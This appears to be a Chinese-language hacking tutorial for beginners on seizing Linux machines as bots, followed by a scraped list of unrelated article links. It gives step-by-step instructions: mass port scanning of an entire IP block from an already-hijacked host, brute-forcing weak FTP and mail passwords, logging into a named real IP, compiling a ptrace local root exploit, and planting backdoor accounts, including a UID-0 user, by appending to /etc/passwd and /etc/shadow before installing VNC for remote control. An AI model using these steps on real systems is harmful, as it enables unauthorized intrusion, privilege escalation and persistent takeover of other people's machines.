适合读者:入侵爱好者、普通Linux网民

前置知识:Linux基本操作

投向Linux肉鸡的怀抱

文/图 密界寻踪

很多菜鸟都在重复的玩3389肉鸡,时间长了自然就腻味了,非常梦想得到自己的Linux肉鸡,

需要工具如下:Ssport,下载地址:

http://count.skycn.com/s0ftdownlOad.php?id=15011&url=http://hn-http.skycn.net:8180/down/ssport.rar

HSCAN,下载地址:

http://www.cnhonker.com/download/releases/Tools/hscan.zip

Putty,下载地址:

http://count.skycn.com/s0ftdownlOad.php?id=9371&url=http://hn-http.skycn.net:8180/down/putty.exe

另外还需要一个VNC的Linux版本,头一次得到自己的Linux肉鸡,当然要看看它的桌面了。工具基本齐全了,下面首先请出Ssport这个强大的、特别适合新手入侵者使用的扫描器。程序界面如图1所示。

图1

软件的中部位置有端口设置,我们添加如下端口22,23,512,513,514。程序上方有IP段落设置,既然想得到大量Linux肉鸡,范围不防设置大点,211.0.0.1_211.255.255.255(脚本小子:记得在自己比较稳定的3389肉鸡上扫描,自己的机器可舍不得啊,太费电了吧?)。

经过好几天的等待,终于扫描结束了。其实Ssport非常方便,中途你觉得差不多的时候,可以保存部分结果进行下一步动作。让这个工具继续扫描时候,它不但从原先的结束点开始,还会问你是把扫描的结果剪除后继续扫描,还是不删除原先的结果扫描,很体贴的。将结果导出为一个文本文件,我们需要简单处理。如图2所示。

图2

选择替换把22、23、512、513、514全部处理掉,就会得到一个干净的IP地址列表。下面就需要我们的第二个工具HSCAN出场了。程序的界面如图3所示。

图3

我们依次选Menu菜单->Pamareter子菜单->Hostlist,把我们刚才整理的IP地址文本导入,还要记得把Ping host before scan选项给去掉,这样可以多得到些信息,不过花费的时间更长。

扫描范围选择好了,再来选择扫描模块,Modules在这里我们选择Check ftp weak accounts、Check pop3 weak accounts和Check imap weak accounts三个模块,开始扫描吧!最终HSCAN会给我们一份扫描报告。如图4所示。

图4

看清楚了么?我们仔细的看这份报告。对于发现了弱口令,且关于FTP、POP、IMAP版本有WU-FTP、VSFTP、PROFTP和Linux、Unix字样的肯定就是Linux系统。看到了报告吗?61.197.254.149这个IP就有弱口令,它的FTP版本是WU-2.6.2.5,肯定是一个Linux系统。

现在我们要想办法登陆上它的系统,这时候用我们的第三个工具Putty。如果你还保存有IP地址的原始数据,就是刚刚用SSPORT扫描后还带有端口信息的那个文本,我们就可以查到61.197.254.149这个IP开放的端口信息,它的22端口是开放的,教菜鸟如何获得大量Linux肉鸡网站安全》(https://www.unjs.com)。这正好方便我们,打开PUTTY,填写IP61.197.254.149,选择SSH协议,点击打开。过一会儿会弹出如图5所示的界面。

图5

我们只要点YES就会出现登陆提示,按照扫描出来的弱口令点登陆就连接到对方主机上了。如图6所示。

图6

输入命令Uname –a查看内核版本,一般版本都不高,给大家推荐一个好的本地溢出代码,连接地址如下:http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c。我们先在命令提示下输入Cat >1.c,然后选择复制这段代码,粘贴到肉鸡上。如图8所示。

图8

然后用Ctrl+z键这段代码就被保存在肉鸡上了。下面我们编译它,输入命令“gcc -o 1 1.c”,如图9所示。

图9

然后执行这个命令,哈哈,看到了么?所有的ID为0,提示符变成了#号,我们已经是管理员了!如图10所示。

图10

加个自己的用户吧:

mkdir /home/.network

echo network::500:500::/home/.network:/bin/bash>>/etc/passwd

echo network::::::::>>/etc/shadow

passwd network

加个管理员以后方便自己:

echo xctc::::::::>>/etc/shadow

echo xctc::0:0::/home/.network:/bin/bash>>/etc/passwd

passwd xctc

如图11所示。

图11

好了,入侵告一段落。

相信很多菜鸟都很渴望看到Linux的桌面。那么我们就给他安装VNC吧,因为它是跨平台的,而且客户端访问可以在浏览器里面进行。安装方法很简单:

tar zxvf vnc-3.3.3r1_x86_linux_2.0.tgz cd vnc_x86_linux_2.0 cp *vnc* /usr/local/bin/ mkdir /usr/local/vnc cp -r classes/ /usr/local/vnc/ 设置Vnc Server的访问密码: vncpasswd 启动Vnc Server:vncserver 最新版本的VNC安装方式就更简单了,大家可以到这里去下载:

http://www.realvnc.com

安装好后有时候不能看到漂亮的Linux桌面,需要我们执行下面命令的任何一个,Startkde或者Gnome-session,这两命令一个是启动到KDE桌面,一个是启动到GNOME桌面。先给大家一个截图诱惑大家一下吧!这可是在Windows下控制Linux哦!如图12所示。

图12

另外大家可以到以下站点找Linux的本地和远程溢出代码:

www.netric.org

http://www.packetstormsecurity.org/

www.cnhonker.com

这篇文章只是希望能指导一下和我一样的菜鸟们,高手请悟见笑。

肉鸡进程linux,教菜鸟如何获得大量Linux肉鸡网站安全 -电脑资料相关推荐

  1. window连接不上linux ftp_xftp怎么连linux,教你xftp怎么连linux

    Xftp是一个功能强大的SFTP 文件传输软件.使用了 Xftp 以后,MS Windows 用户能安全地在UNIX和linux,和 Windows PC 之间传输文件.当然,如果要说文件传输,小编知 ...

  2. xmanager linux,教您用xmanager启动Linux上的图形界面程序-Go语言中文社区

    对于习惯实体化的开发人员来说,还是界面化用着比较习惯,所以这就涉及到掌握使用Xmanager启动Linux上的图形界面程序,为了方便大家的使用,本集小编就详细的为大家讲解具体操作. 具体步骤如下: 1 ...

  3. parallels for linux,教大家Parallels desktop安装linux教程

    Parallels desktop安装linux教程来咯,需要的小伙伴拿走.对于教程这种资讯,广大用户只需做好伸手党便可.毕竟大家对Parallels desktop安装 1.下载Ubuntu系统镜像 ...

  4. 品铂平板电脑刷linux,教你如何把品铂PIPO W8平板电脑升级到win10系统_硬件教程

    品铂PIPO W8的的配置在WIN8平板中是比较高的,INTEL酷睿M处理器性能不容小觑,WIN8大家已经很熟悉了,那么,我们也知道,将来WIN8系统可以无缝升级到WIN10,可做为IT达人,WIN1 ...

  5. 品铂平板电脑刷linux,教你如何把品铂PIPO W8平板电脑升级到win10系统

    品铂PIPO W8的的配置在WIN8平板中是比较高的,INTEL酷睿M处理器性能不容小觑,WIN8大家已经很熟悉了,那么,我们也知道,将来WIN8系统可以无缝升级到WIN10,可做为"IT达 ...

  6. linux系统下定时备份,在Linux系统中简单地实现定时备份的方法 -电脑资料

    运行一个简单的脚本 假设你有一个脚本叫:/usr/local/bin/myscript. ,你想要每隔一小时就运行一次, Service 文件 第一步,创建一个service文件,根据你Linux的发 ...

  7. mysql数据库电脑配置_教你怎样正确配置MySQL数据库SQL Mail -电脑资料

    本文用个人经历来讲解SQL Mail的配置与使用, 用SQL Mail主要是要完成这样的功能: >用户在网上注册后,系统将随机产生的密码发送到用户登记的Email. >用户在论坛的帖子有回 ...

  8. linux 适配电脑内核,Linux内核实践 如何添加网络协议[三]:实现 -电脑资料

    内核版本:2.6.34 接上篇<添加网络协议>, 为了用户方便查看brcm设备的工作状态,使用proc文件系统是很好的方 式.一个网络协议模块可以注册到网络空间中register_pern ...

  9. vb计算机怎么制作,教你如何制作VB的PCode调试器 -电脑资料

    P-Code简介 术语P-Code既不是一个新名词也不是Microsoft的发明,P-Code只是简单地被解释执行的伪指令, MSVBVM50.DLL MSVBVM60.DLL 文件名称清晰的表明是M ...

最新文章

  1. 关系型数据库和非关系型数据库的优劣对比?
  2. python画折线图代码-Python绘制折线图和散点图的详细方法介绍(代码示例)
  3. systemverilog队列
  4. lru调度算法例题_嵌入式必会!C语言最常用的贪心算法就这么被攻略了
  5. ZZULIOJ 1136: 首字母变大写
  6. sm总线控制器找不到驱动程序_细说嵌入式系统下的驱动程序设计
  7. 线程创建 pthread_create 中自定义参数注意事项
  8. 免费的身份证归属地查询接口
  9. 兔玩游戏微博html,和小兔玩游戏小班教案.doc
  10. ppt(office365)之表格使用说明
  11. Java web项目中使用C#配合开发,实现双屏显示功能
  12. 串口通信 数据采集软件 上位机 数据采集软件,可以采集plc,串口通信设备,tcp通信设备的数据
  13. Kubernetes学习-K8S安装篇-Kubeadm安装高可用K8S集群
  14. SkyEye与Trace32集成并搭建调试环境
  15. java实现发送手机验证码功能
  16. 对交换机与路由器的认知
  17. 『树形DP』[IOI2005]Riv 河流
  18. Android数据存储(内部,外部,SharedPreferences,SQlite)
  19. 电机控制书籍复习--高性能变频调速及其典型控制系统-马小亮
  20. Android端集成大疆SDK(MSDK)

热门文章

  1. Java 正则检测大写字母
  2. 全国青少年软件编程等级考试C语言标准解读(1_10级)
  3. OSS 配置url浏览模式
  4. MIUI8不用root更换字体的方法
  5. 计算机设置汉字手机,桌面字体怎么设置-手机锁屏上会滚动的文字怎么设置?一步搞定,超简单...
  6. 选型最佳实践|从业务场景分析直播SDK
  7. Phoenix(凤凰)的安装介绍
  8. 一等公民 二等公民_使您的产品成为一流的公民
  9. hdu5445 Food Problem(多重背包)(*)
  10. latch: cache buffers chains latch: ges resource hash list